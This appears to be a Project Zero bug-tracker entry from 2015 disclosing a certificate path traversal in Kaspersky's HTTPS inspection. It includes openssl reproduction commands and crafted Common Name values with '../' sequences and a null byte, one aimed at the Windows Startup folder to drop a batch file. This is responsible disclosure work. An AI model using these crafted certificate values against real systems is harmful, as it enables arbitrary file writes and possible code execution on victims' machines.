539 - Kaspersky Antivirus Certificate handling path traversal - project-zero

Starred by 4 users

Status:	Fixed
Owner:	taviso@google.com
Closed:	Nov 2015
Cc:	project-...@google.com
Product-Kaspersky Deadline-90 Reported-2015-Sep-18 Finder-taviso Vendor-Kaspersky CCProjectZeroMembers Severity-critical

Kaspersky Antivirus Certificate handling path traversal

Project Member Reported by taviso@google.com, Sep 18 2015

Back to list

When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.

I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.

Here is how to generate a certificate to reproduce:

$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
Generating a 2048 bit RSA private key
......................................................................+++
...............+++
writing new private key to 'key.pem'
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
Email Address []:

Then test start a server like this:

$ openssl s_server -key key.pem -cert cert.pem -accept 8080

And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

	Windows 7 x64-2015-09-18-16-06-39.png 151 KB View Download

Project Member Comment 1 by taviso@google.com, Sep 21 2015

Update from Kaspersky:

Hi Tavis,
 
Thank you for reporting this vulnerability to us! We confirm the bug with Certificate handling path traversal.
We are working on creating a fix. I’ll let you know our fix plan for the bug as soon as we align it internally.
 
Best regards,
Igor

Project Member Comment 2 by taviso@google.com, Oct 9 2015

I believe this issue is scheduled to be fixed today, I'm testing it in a VM now.

Project Member Comment 3 by taviso@google.com, Nov 16 2015

Labels: -Restrict-View-Commit
Status: Fixed

Final fix was released on November 16th.

Comment 4 by athmi...@gmail.com, Nov 24 2015

Hello Tavis, 

If possible can you help me with the following:

How were you able to write a .bat file? I am only able create .cer files. Including the null character '\x00' in the CommonName does not seem to be working. What version of Kaspersky was this tested against?

Comment 5 by athmi...@gmail.com, Nov 25 2015

Also it does not look like the path traversal is fixed on the latest version. 	Kaspersky is still vulnerable after updating to the latest version.

Comment 6 Deleted

► Sign in to add a comment